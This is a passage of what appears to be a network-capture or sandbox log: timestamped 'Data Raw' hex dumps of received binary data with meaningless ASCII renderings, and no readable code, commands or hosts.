                                                                                                                2022-10-13 11:07:30 UTC100INData Raw: 03 9a eb f2 ea c6 89 be 12 15 ba 2e 49 1f 2a 18 5b 79 3d 30 62 5f 93 b8 fe ff ff ff 23 46 e3 d5 09 23 70 68 2a c5 ab 74 e8 d5 c5 8d 79 83 55 03 48 65 89 55 e2 72 89 51 55 0c cd 65 1e 2a c7 6c 24 42 aa 6a 40 53 c3 d5 02 2b 18 ad 55 d9 b0 4e 02 2a be e1 3f 5b aa df f9 21 8f d5 fb c9 25 0f 2a 13 37 28 64 aa 51 42 34 6e aa 0c c0 d8 b6 aa 0a a7 34 f9 d5 0d c6 75 a5 55 e8 db 82 69 c3 67 51 56 ad 0f 0a c1 14 6b 92 d9 5b 1c b1 df e4 3b d3 80 f8 98 69 84 12 b6 b0 52 89 65 e9 09 62 a0 1d 45 67 95 32 ac 53 43 aa 60 6c 78 fe c9 dd aa f5 6d 88 95 d2 23 39 ab 54 88 92 42 c0 1f 6b 8a a1 5a 17 b1 e2 5c 3a d8 80 7d c8 68 8f 12 b6 d0 53 82 65 01 11 63 ab 1d 00 7e 49 f5 cf ad 64 63 b7 fe ff ff 1f 68 56 f0 12 24 93 4f c3 8a 25 d1 50 19 46 3b f4 d3 bf b5 9b 3b f5 3f 81 01 64
                                                                                                                Data Ascii: .I*[y=0b_#F#ph*tyUHeUrQUe*l$Bj@S+UN*?[!%*7(dQB4n4uUigQVk[;iRebEg2SC`lxm#9TBkZ\:}hSec~IdchV$O%PF;;?d
                                                                                                                2022-10-13 11:07:30 UTC104INData Raw: 43 91 b2 c3 2e 3f 4b 24 dc 2e be f6 15 e5 2e 2f 41 63 2b d1 b3 9d fd 0b d1 41 63 5e 8b fe a7 88 6f ff 4d 30 cf c4 14 be b0 6e b8 cd e3 34 85 c0 1f c4 4a 97 62 47 99 0d e3 44 ac ef a4 48 78 f5 32 aa 34 46 29 ed d6 36 1a 10 b9 16 a9 30 ef 2a 39 e1 04 c1 13 5e bc 19 65 33 b4 2f aa 22 8d 02 8b 5e 37 81 2c 85 5e 75 a6 52 97 16 45 fb 15 e3 58 26 8d bc 48 9c d7 50 b2 34 1a c3 8f ce 36 f8 da db 0e a9 8e f5 48 21 e1 7c bc 01 a4 09 31 54 38 d0 91 fd 51 39 d1 ba 68 d7 c6 2e 0c 3c c5 35 d1 0d 0f 60 3c d1 53 c5 c3 c0 2e 9f a5 89 34 d1 53 cf 1f 2b d1 12 c2 2e 12 d1 13 65 58 dc 2e 4f 67 e4 f7 2e d2 1a dc 02 d1 93 f3 14 ce 2e c4 86 92 31 d1 b2 32 80 c2 2e 0b 11 25 cb 2e 59 c3 86 37 d1 65 ab cc c3 2e 11 49 5a dc 2e bc b0 10 f6 2e e7 72 aa 74 fe 07 29 7e 36 4e 5e 98 e6 52
                                                                                                                Data Ascii: C.?K$../Ac+Ac^oM0n4JbGDHx24F)60*9^e3/"^7,^uREX&HP46H!|1T8Q9h.<5`<S.4S+.eX.Og..12.%.Y7e.IZ..rt)~6N^R
                                                                                                                2022-10-13 11:07:30 UTC108INData Raw: 16 cc 61 24 ed d5 18 2a e8 a6 d0 7f 5a 23 36 56 77 f8 32 2b 5a c5 5e af ba 99 dc 04 bf a7 b0 af 12 22 dc dc 0c 26 58 87 79 29 86 82 da 03 b7 a6 5f aa 06 40 38 ae 0f 83 c6 85 8d 64 fb bf 53 63 21 c1 bd 81 91 88 69 e3 87 29 1d 96 82 7d 85 c5 33 c9 73 7c 3a 2f 47 89 22 1d 0c 1c 87 9f c5 7f 87 0f e9 e2 f8 a2 c1 df e2 f4 08 0d 62 3a 5d c5 8c 10 1d 76 a4 22 2c 1d c8 fc 54 88 c5 c5 ad cc e5 e2 32 9e 59 75 3a 2f 45 57 8c c5 a3 9b ad d2 e2 d0 60 a3 6f 3a 03 cb 2b 19 1d b4 56 e5 2f 1d 00 f4 29 92 c5 a1 e3 c0 b1 a0 08 fa cc a0 8d 0c bd a8 d5 09 67 b8 cf a5 e2 d7 3e c7 07 d3 e2 32 75 a1 66 4b f1 6c fb 4f f6 d8 1f ed 72 7d b4 bc d9 f8 b6 11 99 79 b3 e3 6b 07 59 66 93 6e f0 c7 96 b0 00 79 9e b5 14 c3 ad d5 10 f7 c6 ca a5 72 5f 40 c2 07 5a aa 4c 70 a1 2e 13 8f 69 fb 16
                                                                                                                Data Ascii: a$*Z#6Vw2+Z^"&Xy)_@8dSc!i)}3s|:/G"b:]v",T2Yu:/EW`o:+V/)g>2ufKlOr}ykYfnyr_@ZLp.i
                                                                                                                2022-10-13 11:07:30 UTC112INData Raw: b9 7c e4 26 60 7c 79 e4 97 e9 7b 79 e4 92 b0 07 fb c6 3b 07 62 8e 1b 4b 71 a7 04 39 50 6b 12 c2 12 e1 22 58 b1 1c 4f 0a b1 ff fe ff ff ff 06 c8 77 0d 7d 3b 6a 82 b2 f5 80 13 75 0d d8 fe 99 75 0d 99 6d 65 86 12 d8 35 a5 7d 0d 6a 81 ad 7a 4d a2 fa 96 80 52 3a b6 33 7e 0d d4 8e 2d 7c 6d 6c 47 1a 7f 4d c7 02 40 8c 32 58 e9 71 77 4d ab da 08 80 f2 8e ac 82 80 f2 ff 37 7e 73 ed f5 cf be 88 f2 88 6b b6 8f b2 00 60 8d 75 ad 9c 3c 7f d1 ba 7e 8d ba 86 76 dc 32 ce 5b b1 cb d9 c8 5b f4 02 ee 4f 79 6b 3d ad 34 a4 9e 20 70 3e a4 e7 bd b5 3b a4 52 24 b2 3b a4 03 35 ce b9 86 ba 9a ab cc 5b ba 84 6e 46 79 0d 7f 5f b4 86 dc 06 5e cd 5b 4f 49 b5 cb 5b a2 38 82 4c 79 35 1f c1 37 a4 90 2a 1c 3d a4 dd d7 d9 38 a4 44 c6 de 38 a4 c9 e7 a2 ba 86 a0 ae 44 8f f2 61 f3 41 92 dc 2a
                                                                                                                Data Ascii: |&`|y{y;bKq9Pk"XOw};juume5}jzMR:3~-|mlGM@2XqwM7~sk`u<~v2[[Oyk=4 p>;R$;5[nFy_^[OI[8Ly57*=8D8DaA*
                                                                                                                2022-10-13 11:07:30 UTC116INData Raw: d1 97 22 3e 52 2e f1 9d 52 72 d1 e9 74 4f 3f fc ff ff ff dd 20 08 61 aa 7d 7a cf 6e a5 66 ed 9a ff d5 e2 1f 91 ff 25 55 91 6d 00 84 06 50 93 ff f3 75 62 99 ff c0 b2 c9 99 ff 7f df b2 61 00 6e e4 f9 98 ff 3d bf 12 63 00 02 37 cd 69 00 e8 bc 4f 6e 00 4d b2 82 83 ff 41 b6 70 88 ff 51 c1 fe 74 00 24 ca 3f 8a ff 03 d1 0d 80 ff 78 3e a6 80 ff 3f 3b dd 78 00 d2 90 96 81 ff 55 1d 26 7f 00 8e 61 9d 93 4a 33 34 a4 2e 11 11 cf 8d 2e 9c f1 37 53 2e 73 76 5f 56 d1 1f 1f 17 bc 2e 3c dc 5d ae 2e 24 36 fd 4e 2e d9 aa 90 57 d1 45 ae 37 50 2e dd e9 f9 56 d1 d6 a7 7d 5b d1 e9 1f 95 59 d1 7d 4d 6e 70 d1 61 c5 96 ae d1 79 c2 fe ab 2e d4 eb b6 41 d1 68 30 fc 53 d1 08 2a 5c b3 d1 e5 29 1e a0 2e 4b ed a4 c0 fc ff ff ff 2d f1 ce 1e 9c 65 91 e8 91 29 f0 3e 62 00 4b a3 bc 65 00 52
                                                                                                                Data Ascii: ">R.RrtO? a}znf%UmPuban=c7iOnMApQt$?x>?;xU&aJ34..7S.sv_V.<].$6N.WE7P.V}[Y}Mnpay.Ah0S*\).K-e)>bKeR
                                                                                                                2022-10-13 11:07:30 UTC120INData Raw: 42 75 70 e0 ab ae ed 4e 50 2e 49 7f 2c 40 09 42 00 ad d1 63 a0 7e 74 a3 69 17 4a d2 17 1e ea b0 57 23 40 43 50 93 07 0b 3f 48 41 d1 a1 5e 9f dc 35 e2 2e f8 9e cc d3 fc e5 dc bf 50 e4 dc bf 01 00 00 00 55 c1 7d 61 23 4f 6c 50 87 6b b4 44 2e f6 bf 2b 4e 22 10 fa fe 7a ed df 1f b7 f2 f2 45 2e ec d7 0a 3f 40 8a f4 c0 bf fe ff ff ff 85 e1 58 5f d9 74 a2 cf c6 78 cc b9 2e d2 33 23 ce 40 3e 97 fe b4 c1 69 30 d2 bc dc b4 2e 21 9c d5 c7 b4 08 ea 5c d1 37 ba 4a 45 d1 98 2c 5c d6 7f 0a ab c5 96 0e af 85 c5 07 b5 cb e1 a4 2e 97 43 99 d0 49 43 dd ff d7 bf 00 4f ba d7 bf f3 f6 28 e0 e1 2d ca 47 d1 72 fa d5 bf fe ff ff ff 8f ed 8b 5e b5 4a 2d c0 9e a9 90 aa d1 36 2a 3b 2f 40 cf d0 33 de bf 45 00 21 80 19 a9 a8 4e d1 c8 31 d0 bf 01 00 00 00 19 a3 71 61 68 d3 2a 40 18 c0
                                                                                                                Data Ascii: BupNP.I,@Bc~tiJW#@CP?HA^5.PU}a#OlPkD.+N"zE.?@X_tx.3#@>i0.!\7JE,\.CICO(-Gr^J-6*;/@3E!N1qah*@
                                                                                                                2022-10-13 11:07:30 UTC125INData Raw: ce ff fc 57 82 af 96 72 69 b2 91 05 91 c9 ff 00 00 00 00 91 34 69 61 dd 35 c8 5f 91 64 2e 41 6e 3f 4d 21 e7 ca 2c 3a bf 91 6d fe 3e 00 00 00 00 00 a2 62 5d 9f 98 07 3f 78 f1 49 75 bc 6e f0 21 6f 5f 6e bd fa 97 7f fd ff ff ff 1c 77 77 1f 28 3c 4c 19 40 8d 2e c3 1c 40 7d 33 6d f0 a5 fb 63 96 d1 96 32 5f 10 1d 05 c3 93 2e 8a b4 db 58 68 9a df fe db df 10 20 ce 8e e7 60 d1 00 d5 b9 3f fc ff ff ff 18 0a 58 1f a6 1d 21 cb ff 6d b0 bf 0f c5 38 e2 84 6e 80 54 79 04 c2 2b ca be 74 06 d2 7f 3e dc e5 bb 6e 7d c7 d0 87 ed 7f 0e a5 91 f1 1c d4 24 00 42 13 fa 87 77 12 d6 46 6e cf 42 59 4b 91 65 b5 9d c5 ff 54 db 50 28 00 78 7f a2 23 00 84 40 2c df ff e9 c3 ed 21 00 3a b8 df 2b 00 1d 5f 74 2b 00 9a 22 0f d3 ff cf 91 44 2a 00 5c f2 af d1 ff 33 72 70 db ff c9 21 f2 dc ff
                                                                                                                Data Ascii: Wri4ia5_d.An?M!,:m>b]?xIun!o_nww(<L@.@}3mc2_.Xh `?X!m8nTy+t>n}$BwFnBYKeTP(x#@,!:+_t+"D*\3rp!
                                                                                                                2022-10-13 11:07:30 UTC128INData Raw: d8 c1 58 65 8e f8 91 50 68 89 80 9c 99 eb d9 df de e4 4b 0d 61 86 86 60 ab 2d 71 2e ac 4c 54 00 00 e0 ff 3d 20 f1 61 37 a3 a5 9d ca 8b b1 9c 78 dd 4b 19 f3 60 81 f8 cf 66 40 5d 80 44 54 00 00 60 ff b5 f0 a6 7a 4d cb c3 94 8a ca 2b f3 6b 35 db 75 d8 ff 1f 66 c8 51 65 da f8 69 87 d9 40 dd 06 53 fc a8 b5 18 c7 66 cf 17 f7 93 8f ff 27 ae 47 b6 2e 2f 19 e8 10 ca 51 70 9c 99 aa 9f 4e b6 ab 00 00 5f fd 98 da 75 78 a3 47 ec ff 76 4f e8 f7 1c 2e 2d f1 c9 c4 40 a6 c1 a9 e9 cf 60 bb 7d ce 18 82 30 60 03 99 ea 0d 3d bd ab 00 00 a1 02 f2 41 7e 5d 6a 1f 00 00 c6 7f 50 22 b4 26 16 39 dd 27 b6 90 65 a8 f8 2c 00 74 ed f0 c9 9a 41 ba 84 78 fb 92 91 e2 45 23 05 35 10 81 53 c1 f4 74 55 6b 72 54 54 ff ff df ff 80 13 10 4a a0 b7 0a bf 67 b1 57 60 30 d1 9a 5a 54 00 00 00 00 3b
                                                                                                                Data Ascii: XePhKa`-q.LT= a7xK`f@]DT`zM+k5ufQei@Sf'G./QpN_uxGvO.-@`}0`=A~]jP"&9'e,tAxE#5StUkrTTJgW`0ZT;
                                                                                                                2022-10-13 11:07:30 UTC132INData Raw: 0b 84 85 38 6a a4 08 d1 6f 47 b8 6a 7a 13 68 0e b9 01 63 43 69 7a 20 cd 4e 29 ac 8b 9c d7 bd 81 02 13 b3 9b a3 9e c5 b6 fc bf c0 e2 aa 96 73 7d 3a c3 7b f2 0f 1d c8 2a 5c 33 1d 46 da 2a 97 c5 e3 23 b2 fa e2 bc d8 27 6a 3a 69 0b 29 93 c5 ed 05 d3 cd e2 4e 96 dd 70 3a f5 4d 55 06 1d 32 e8 9b 30 1d be b2 57 8d c5 e7 c7 d6 ff e2 74 f6 78 c3 e2 9a d6 0e 67 3a ef d7 96 0a 1d 48 54 03 9a c5 e5 af 70 b3 20 a8 e4 cb b2 2d 23 41 8d 39 26 4e 3b 13 19 cb 0e 3e e4 87 0b 2d 50 6d de 29 41 93 b9 95 44 02 96 de e5 87 aa 10 d6 47 af 67 1c 64 e1 e2 7e df 7d bb 7a cb f6 0e ad 4f 78 9a ad 99 fd cb 3f 88 39 ce d6 45 16 19 52 0e 40 e1 87 0a ed 2e 68 de e8 11 ed bc 95 15 d2 e8 db e5 57 64 48 1d ec 3b f1 da fd 80 19 42 61 7d 48 9e 85 6b 81 c9 99 d7 5d 34 bc c6 96 b1 97 ef 34 5d
                                                                                                                Data Ascii: 8joGjzhcCiz N)s}:{*\3F*#'j:i)Np:MU20Wtxg:HTp -#A9&N;>-Pm)ADGgd~}zOx?9ER@.hWdH;Ba}Hk]44]
                                                                                                                2022-10-13 11:07:30 UTC136INData Raw: 6f 58 0c f7 4d cb 04 e9 fb 63 c5 86 a3 dc 1d d7 c0 93 81 5a a3 8c 08 f7 f3 08 b2 f9 2a fd 74 38 fd f5 81 76 bc 1c a1 41 e9 32 eb 32 6e a1 6a 7d 0b 09 fc a5 59 29 f8 56 db d4 13 71 fd 2b 06 21 d1 35 51 ba 0a d1 e0 34 82 ff 2e ad fd 4a 33 d1 be 70 cc cc 2e 04 44 de 3f d1 6d 47 7b 36 d1 6f 55 d8 ca 2e a7 85 92 3e d1 03 0f 04 21 d1 f2 c2 35 18 d1 7f ad 43 d6 2e a3 f7 ff fd 2e 2a 7a c7 08 d1 b3 13 0f c4 2e 6c f6 89 3b d1 ae aa 9b c8 2e c7 31 3e c1 2e 61 81 5b 24 d1 a4 1c a0 74 fe 27 20 31 ef 78 05 35 ae 98 6a c7 6e 30 25 ec 57 46 b8 72 d6 6e d7 ab 29 16 ee cf 07 99 19 91 87 33 a9 32 f9 ce 44 62 2e 91 ff 2e d2 4b f9 56 20 05 30 91 3d fd f4 a7 33 ab b7 97 c4 6e 5f a6 c0 22 f7 ac 55 ec 3f 67 13 9c 3c f3 7c 80 a4 c1 6e 22 db 90 06 f4 d2 2b d6 a3 41 7b bc f4 f2 5f
                                                                                                                Data Ascii: oXMcZ*t8vA22nj}Y)Vq+!5Q4.J3p.D?mG{6oU.>!5C..*z.l;.1>.a[$t' 1x5jn0%WFrn)32Db..KV 0=3n_"U?g<|n"+A{_
                                                                                                                2022-10-13 11:07:30 UTC140INData Raw: d7 72 30 a4 72 70 99 36 a4 8f 39 ae b1 86 84 af 8c 77 cd 14 23 67 63 a3 d2 59 9e 40 01 00 00 00 85 32 79 ed 5b fd 33 8e f2 96 5b b9 8e f2 dc 08 45 7d ed fe d8 85 86 f2 af 5c 8d 81 b2 84 0f b6 7b ad b8 e3 13 85 f2 b6 0b 0d 87 92 fa 2a 3a 84 b2 a1 97 60 77 cd da 8c 51 8c b2 da a7 28 7b 0d b8 49 a2 7b 0d 0d 32 5e 88 12 f0 ca 9e 73 0d a6 a6 96 74 4d b5 fd ad 8e 52 09 99 08 70 0d 98 3c 4a dc ba 7d 25 fa b5 6d e3 8a 84 68 04 3e 4f 81 68 e1 87 48 81 68 48 26 34 03 4a b5 81 51 76 97 bd 97 94 fc b5 b6 9c a5 0e 4a df a5 a4 77 97 f0 e2 4f 71 97 2d 8b 78 f6 b5 d2 94 3b 8d 68 fb 61 e6 87 68 8a d4 23 82 68 df d5 24 82 68 d2 84 58 00 4a a7 c3 3d 75 97 2f 75 f8 ff b5 20 06 c9 0d 4a e9 57 c8 74 97 1e 01 e6 cb 61 e7 c0 37 c9 81 2f 22 16 71 d8 78 be 03 4a a5 2f 07 c0 21 b5
                                                                                                                Data Ascii: r0rp69w#gcY@2y[3[E}\{*:`wQ({I{2^stMRp<J}%mh>OhHhH&4JQvJwOq-x;hah#h$hXJ=u/u JWta7/"qxJ/!
                                                                                                                2022-10-13 11:07:30 UTC144INData Raw: e1 0e 6c d6 c7 05 0b f9 50 d1 66 b1 c5 fe d7 ea 37 a6 dd 55 ca b7 2e 0e 97 a3 ed f3 bb ff fe 7a f0 24 00 65 61 c6 4c d1 2b b0 d3 bf fe ff ff ff 54 c2 49 5f d5 b9 2a 38 c1 fa 21 80 2e 67 20 e9 b9 a8 31 51 5b d1 f1 bc cc c7 78 e0 4b 83 2e 33 58 f6 5f 2e d1 0f 88 25 40 ba 72 73 2e 40 ed 92 d7 c7 e4 e1 a2 58 d1 37 2a 4b be 2e bd 53 13 2f 40 aa 46 68 d7 bf e3 65 23 2e 40 a8 06 c8 d5 bf b7 a6 17 df bf a5 65 95 d8 bf 88 63 58 35 40 ac 2f aa 3e 40 d4 10 24 c2 bf f1 63 e5 3c 40 a2 88 d7 36 40 31 47 7c 36 40 92 1a 07 ce bf b3 31 4c 37 40 f4 42 a7 cc bf 9b 12 78 c6 bf e5 6e ae 3b 40 45 3c 08 c1 d8 d3 d3 64 92 20 e9 96 9e 54 bd d6 3d 21 0f f5 29 86 e1 c1 ac ae 2e 9b e0 a5 f3 7c d7 0a 0e bf 06 9b 99 ad b6 1f b9 8d 55 1b 4e 26 e5 67 bd f3 e2 b2 08 39 26 e1 39 9d 67 de
                                                                                                                Data Ascii: lPf7U.z$eaL+TI_*8!.g 1Q[xK.3X_.%@rs.@X7*K.S/@Fhe#.@ecX5@/>@$c<@6@1G|6@1L7@Bxn;@E<d T=!).|UN&g9&9g
                                                                                                                2022-10-13 11:07:30 UTC148INData Raw: cd 85 cb 8e 90 b2 ea 50 f7 67 0d 1c 36 7d 67 0d b1 65 81 94 12 cb c5 41 6f 0d b1 b9 49 68 4d 82 d2 72 92 52 0a 8e d7 6c 0d a7 3e c9 6e 6d 5b 87 fe 6d 4d 08 ec 89 2c bb ae 66 ef 1b 43 0d 1c 68 39 64 36 2d 9a c6 25 af 2c e3 1b de b0 c7 e5 1b 8b 61 f0 62 39 20 6e b3 19 e4 01 9b 6e 13 e4 b4 f6 ab 16 e4 29 4f ac 16 e4 2c 06 d0 94 c6 b9 89 b5 e1 1b c5 ff 70 6b 39 72 1c 41 99 c6 07 b5 40 e0 1b 18 22 ab e6 1b 01 e3 9c 61 39 8e 84 df 1a e4 ef 69 02 10 e4 62 1c c7 15 e4 2b 51 58 a8 12 2a 8e f8 c8 9c a1 87 0f ff fe ff ff ff 84 86 79 6d ef 96 14 8e f2 66 58 9e 8e f2 3b e3 62 7d ed 15 33 a2 86 f2 10 df aa 81 b2 af 3c 91 7b ad b7 f8 34 85 f2 8e d8 2a 87 92 22 21 1d 84 b2 91 44 47 77 cd 31 6f 76 8c b2 1d 7c 0f 7b 0d f3 32 85 7b 0d 4d 91 79 88 12 33 29 b9 73 0d 02 d5 b1
                                                                                                                Data Ascii: Pg6}geAoIhMrRl>nm[mM,fCh9d6-%,ab9 nn)O,pk9rA@"a9ib+QX*ymfX;b}3<{4*"!DGw1ov|{2{My3)s
                                                                                                                2022-10-13 11:07:30 UTC152INData Raw: e8 f0 68 08 d3 63 7a 50 c7 3d 25 1b 44 91 5d 51 5c ca 61 fe c0 f9 1c 5d 75 73 45 f1 ff c7 85 32 ac 31 2d 23 00 00 00 10 2b 67 6a 6d f9 e3 cf ce 5d 0c 81 4e cd f5 a2 98 06 1c 1a 15 69 88 ff ff 74 02 44 fe f3 ff 03 5d 99 ce fb 8c 52 fb 3a ce a2 be e0 0f e6 a4 06 00 80 f7 2f f9 57 c8 02 d0 4b a1 30 a7 08 f0 df 24 f3 f5 58 a0 5e cd 66 66 7e 6f c1 17 9a c0 8c 4d 3c 89 22 fd a2 54 c7 14 f1 53 29 ad 22 42 81 02 13 b3 4f 02 65 3a 09 29 e0 3d 1d 62 52 ee 80 c5 31 a1 66 f6 e2 de 0c a8 c0 e2 5a 96 64 7d 3a c3 5b e5 0f 1d e8 ca 4b 33 1d a6 8a 3d 97 c5 b3 eb a5 fa e2 74 10 30 6a 3a a1 d3 3e 93 c5 35 35 c4 cd e2 7e fe ca 70 3a 9d 95 42 06 1d ea 80 8c 30 1d d6 fa 40 8d c5 af 97 c1 ff e2 24 0e 6f c3 e2 62 9b 85 b5 60 29 f8 63 5c 37 d6 0c 97 7b 13 bc d4 bf ac 5a 80 01 df
                                                                                                                Data Ascii: hczP=%D]Q\a]usE21-#+gjm]NitD]R:/WK0$X^ff~oM<"TS)"BOe:)=bR1fZd}:[K3=t0j:>55~p:B0@$ob`)c\7{Z
                                                                                                                2022-10-13 11:07:30 UTC157INData Raw: 52 db bb 4b 91 8a 3c 14 3b 40 80 79 04 62 12 cc 5a 6e 14 79 fa 38 ee af 0e a9 a8 7d 34 2b 9b f9 65 52 25 42 15 a8 58 05 4b 75 f8 29 1b b4 aa a8 af 3b b4 aa b8 ae 88 b1 4a 69 63 85 4e 75 36 28 97 49 d5 24 59 27 a5 aa ba 05 ab 50 55 93 30 af 55 95 ed d4 f2 50 d5 b6 c8 8c ac ea b4 62 ac a5 8a e3 db b2 5a 55 3a 45 92 5a 55 54 c4 21 5f b5 43 19 2c a0 8a 8d a2 3e a7 2a a9 93 8e 4b 55 30 a8 7e be 2a 49 9f 2e 40 b6 5f dc 6f 8e de a7 54 f1 b7 99 80 39 05 fa 31 b7 1d fa 20 a5 93 34 59 d9 c8 d1 8e 2a da b8 0e eb 3d 27 68 f1 35 bf 6e b0 e6 9a cf bf fa 83 8a 21 b1 71 e7 ad 0f 4a 3a 23 b8 9e 71 3a 53 30 00 48 1d 04 5d f4 05 75 f3 79 0b df d9 ff 50 a8 26 24 3d ea db 25 14 a2 8f cc d8 ec a5 51 e8 d5 71 8f 9b eb 39 f8 1a fe 6c 36 7e da 37 21 09 29 07 9b f7 6d 5c 95 eb e3
                                                                                                                Data Ascii: RK<;@ybZny8}4+eR%BXKu);JicNu6(I$Y'PU0UPbZU:EZUT!_C,>*KU0~*I.@_oT91 4Y*='h5n!qJ:#q:S0H]uyP&$=%Qq9l6~7!)m\
                                                                                                                2022-10-13 11:07:30 UTC160INData Raw: 7e 51 f8 95 38 bd 7c 1a 4d d5 c4 7f e9 66 2e 8b 6f 6d d5 1b 66 92 95 15 d9 b1 5d 15 37 64 84 de b2 32 c8 69 02 22 77 58 07 2b 12 cc 1f 5f ea 6e 8d 93 59 ea 93 24 d4 09 4d 15 05 f7 8f 8a ea 6f 07 ff ff ff 7f b3 f6 4f 9c 86 81 91 c8 ca 8a f7 13 a1 4d 1d b1 d1 ff e1 e3 34 b5 9d 92 c9 5f 6a 6f d3 c1 39 6a d1 51 78 ee d4 22 f0 4c 70 ea 7e 16 fa 14 0a be 77 03 c1 95 d5 e4 5b ea 7f 7c ce 4f 17 6a 7c b4 07 0b 87 80 fa e1 6f 6a b8 b8 fe f2 7a 90 59 f1 95 2a e9 b6 c4 8f 64 cf 64 53 fe ff ff 6f 1d ba 07 2a 2f 08 48 76 aa ea 42 a4 ae aa 90 35 48 e1 d5 3f 94 09 bd 55 c2 d8 7e 3c 2a ca d3 35 52 aa 71 28 63 fd d5 02 41 12 a4 55 23 31 0c 70 2a 87 d9 08 f0 d5 1b 37 05 9b 55 3d 0a 19 91 55 f0 50 f5 49 55 7e 8f 19 06 2a 9d 3e 58 5a aa 64 7a 2f db d5 58 51 64 b5 55 27 32 32
                                                                                                                Data Ascii: ~Q8|Mf.omf]7d2i"wX+_nY$MoOM4_jo9jQx"Lp~w[|Oj|ojzY*ddSo*/HvB5H?U~<*5Rq(cAU#1p*7U=UPIU~*>XZdz/XQdU'22
                                                                                                                2022-10-13 11:07:30 UTC164INData Raw: df 7c 6d 07 20 e8 7f 4d a0 65 b2 8c 32 10 4e 83 77 4d 57 e5 fa 80 f2 92 5b 70 80 f2 a3 88 8c 73 ed 02 00 4c 88 f2 6c 6c 44 8f b2 2c af 7f 75 ad 28 4b 8d d1 ba 6c c4 6d 00 64 99 75 a8 2e 97 65 d2 af d1 76 3a 1c a9 2e 24 3c 98 a4 2e 8c 34 70 a6 2e 09 4e 8b 8f 2e e3 26 73 51 2e db f1 1b 54 d1 46 30 53 be 2e 4c ab 19 ac 2e d3 61 b9 4c 2e 8e fd d4 55 d1 72 e1 73 52 2e 2c 06 bd 54 d1 e6 40 39 59 d1 71 a8 d1 5b d1 f4 0a 2a 72 d1 46 9a d2 ac d1 07 82 05 a7 2e 8c f5 28 c0 fc ff ff ff 3c 3e 8a 1e 64 cd 3b 5b 91 99 70 47 58 e0 90 d3 9f 69 da 64 36 00 36 68 36 00 ff ff ff ff 78 11 92 5e 27 c3 39 78 a8 ed ed a5 91 8b d9 42 8a 5b 97 7a 80 fd ff ff ff 85 d5 af 9e 1c 2d 60 98 be 3e 0b b0 98 f2 d8 f8 bf b4 b0 6c f8 b1 5d f8 9f ea 3c ef 06 40 1e ef 06 40 fe ff ff ff e6 ca
                                                                                                                Data Ascii: |m Me2NwMW[psLllD,u(Klmdu.ev:.$<.4p.N.&sQ.TF0S.L.aL.UrsR.,T@9Yq[*rF.(<>d;[pGXid66h6x^'9xB[z-`>l]<@@
                                                                                                                2022-10-13 11:07:30 UTC168INData Raw: f8 3b 2f 16 93 40 83 80 43 fa 2a 6f 7f 7c 0d a0 e5 4e 53 16 05 40 5f 97 04 ce 0d fa 4b ff 63 7a 49 8b f0 5c 2b 5a 0b 39 e0 97 55 0b c9 ad 9b a3 f4 2e 93 99 bd f4 c4 a5 bc aa f4 1c 16 c1 6a 0b f4 e0 18 a4 f4 13 34 ed b5 f4 50 57 a9 b8 f4 f3 35 3c 7b 0b a5 d2 86 56 0b e6 02 3d aa f4 07 7e 81 a5 f4 03 9b 8d 53 0b 38 e5 8f 4d 0b fe 4b aa 5a 0b aa 48 d7 9a f4 12 ce 0e 54 0b 5d 50 1c 5a 0b 06 a6 fb 10 eb 09 d1 6f d1 91 aa cc 4e 5b 13 08 4b 57 94 95 68 c3 bf fa f1 cb b0 63 a0 63 5e 1a f1 b4 69 75 8e f4 37 73 a0 84 3f fc f0 44 6c 8f 4c 5f 11 05 55 10 a0 2e f2 7f 3a 91 01 e9 fa bf 80 c5 fb 59 9a 5e 81 c6 17 d4 b7 72 c3 9f da d3 d1 b0 f3 30 41 44 1a f9 bc 4b 6f 8e bc 7f 51 ba 84 df 1c d2 5e 6c af 6c 7d 0b 05 05 40 82 34 f2 bf fa ac 75 04 5b 85 b0 d8 01 97 d6 68 0b
                                                                                                                Data Ascii: ;/@C*o|NS@_KczI\+Z9U.j4PW5<{V=~S8MKZHT]PZoN[KWhcc^iu7s?DlL_U.:Y^r0ADKoQ^ll}@4u[h
                                                                                                                2022-10-13 11:07:30 UTC172INData Raw: c8 7f 67 80 cb ff fd d4 0d 3f f8 86 42 30 a9 82 4f 82 e1 62 d7 cb 3f ec 0e 91 c3 f6 e5 27 03 9a 61 59 ec c6 06 f1 6f de 3b 80 73 b3 d2 65 02 bd 83 cd 05 f4 06 c6 3e 08 91 db 4d 3d 80 4c f7 69 c1 7f 53 88 9a cc 7f 4f d7 f5 3f 80 7f 4e 5d 33 80 f7 90 3d cf 7f 06 f3 91 ca 7f 6a f7 c6 33 80 5d ab 93 37 80 3a b7 e2 cb 7f 07 1f fb 32 80 a3 75 70 32 80 da 79 54 ce 7f db 0e a7 c3 7f d7 59 c8 30 80 c5 10 60 3c 80 a1 ee 00 c0 7f 7a 75 ac c5 7f de 89 fb 3c 80 1b 83 f5 3d 80 1f 78 e4 52 e4 af f7 2f b9 ce 58 e9 d2 b5 48 96 1f d1 46 ff 15 8e d2 46 ec ee 54 22 49 95 96 da dd b6 64 02 7f d6 46 e9 58 d9 2c 48 30 98 c5 2f b9 d3 ac e8 25 ba 4d 48 75 d7 b7 70 5b cd d3 46 da 8c d3 2e 4a 0c b2 25 2d b9 d3 39 b4 2e b9 e8 ea 6e de b6 f9 7a e0 21 49 38 be 45 2a b9 5d 97 a7 de b5
                                                                                                                Data Ascii: g?B0Ob?'aYo;se>M=LiSO?N]3=j3]7:2up2yTY0`<zu<=xR/XHFFT"IdFX,H0/%MHup[F.J%-9.nz!I8E*]
                                                                                                                2022-10-13 11:07:30 UTC176INData Raw: bf a0 55 2a b6 f4 4a b6 df c7 66 17 35 f6 32 8b b4 42 d0 4a 50 ea 09 d1 6f 5e a2 14 33 0c 9b f7 95 65 1f 4d 42 0b 4d 13 36 40 c6 89 e5 a3 f4 7d 66 b0 af 15 f6 2e 90 f8 db e9 cc eb 75 da fe 6d 74 52 b4 f4 e5 51 0e 46 0b 4e 58 90 10 eb 09 d1 6f b3 76 c7 4c 97 54 e9 cd 93 ff ba c8 f6 28 f0 43 5e b1 7e b3 63 72 4b 55 80 d0 8f 55 6c 1f 89 b4 af cb 46 b8 bc bb 06 00 10 83 18 1a 8a 62 11 75 4b 3b f2 b3 50 ea 09 d1 6f 18 9c e3 8c 68 2d 9e 07 25 6a 4e ed cf 9e 96 e6 55 0b 0f 3f 95 07 39 25 1e 40 03 9c f8 cf 02 73 5e b6 f4 96 00 a8 00 45 ab c6 42 0b 26 63 f8 23 08 8c 17 da 7e 7c ed 41 b2 f4 c0 9a cb 44 0b 1f 5a 31 67 44 f4 37 ef 23 79 92 51 06 d0 7c 4a 